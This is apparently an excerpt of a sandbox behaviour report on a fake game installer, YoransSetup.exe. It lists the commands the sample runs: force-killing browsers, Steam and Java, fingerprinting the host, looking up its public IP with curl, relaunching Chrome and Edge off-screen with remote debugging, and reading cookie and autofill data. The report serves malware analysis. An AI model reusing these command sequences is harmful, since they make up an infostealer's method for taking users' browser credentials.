Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq firefox.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Steam.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "c:\users\user\appdata\local\programs\unrealgame\yoranssetup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "c:\users\user\appdata\local\programs\unrealgame\yoranssetup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-us --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "c:\users\user\appdata\local\programs\unrealgame\yoranssetup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "c:\users\user\appdata\local\programs\unrealgame\yoranssetup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-us --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kwebsqlaccess --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\sqlite3\package.json VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\sqlite3\lib\sqlite3.js VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\sqlite3\lib\sqlite3-binding.js VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\registry-js\package.json VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\registry-js\dist\lib\index.js VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\registry-js\dist\lib\registry.js VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\win-version-info\index.js VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Programs\unrealgame\resources\app.asar.unpacked\node_modules\win-version-info\package.json VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr\Autofill VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr\Autofill VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr\Autofill VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7m9uz3mai4sr\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Program Files\Google\Chrome\Application\chrome.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillRegex VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
